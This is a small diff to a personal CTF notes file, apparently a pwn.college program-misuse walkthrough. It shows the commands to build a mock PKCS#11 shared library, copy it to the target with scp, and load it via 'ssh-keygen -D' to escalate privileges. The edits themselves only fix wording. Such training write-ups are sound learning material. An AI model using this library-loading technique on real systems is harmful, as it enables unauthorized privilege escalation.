slaee/retsec-daily-notes/privilege-escalations/linux/program-misuse.md

 }
 ```

-Then run `build/linux/build.sh` to build our `pkcs11-mock.so` and transfer it to our ssh target remote connection with `scp`.
+Then run `build/linux/build.sh` to build our `pkcs11-mock.so` and transfer it to our target ssh remote connection with `scp`.
 ```bash
 $ scp -i key -r pkcs11-mock-x64.so hacker@dojo.pwn.college:/home/hacker/
 ```

-Run the the exploit to the target machine with
+Run the exploit to the target machine with
 ```
 hacker@program-misuse-level-51:~$ ssh-keygen -D ./pkcs11-mock-x64.so
 [pkcs11-mock by relro for pwn.college level 51 HARDDDDDDD]